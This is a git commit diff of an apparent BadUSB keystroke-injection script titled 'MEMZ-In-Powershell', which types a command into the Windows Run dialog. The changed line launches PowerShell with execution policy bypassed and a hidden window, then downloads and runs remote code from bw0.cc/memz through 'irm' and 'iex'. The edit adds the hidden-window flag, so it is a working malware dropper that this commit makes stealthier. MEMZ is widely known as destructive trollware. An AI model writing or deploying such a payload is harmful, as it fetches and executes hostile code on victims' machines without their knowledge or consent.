Update MEMZ-In-Powershell.txt

This commit is contained in:
egieb
2025-06-18 15:12:44 +00:00
committed by GitHub
parent 485e0351fa
commit 13648cd664

View File

@@ -11,7 +11,7 @@ REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -Ep Bypass -C irm https://bw0.cc/memz | iex
STRING powershell -Ep Bypass -W H -C iex (irm bw0.cc/memz)
ENTER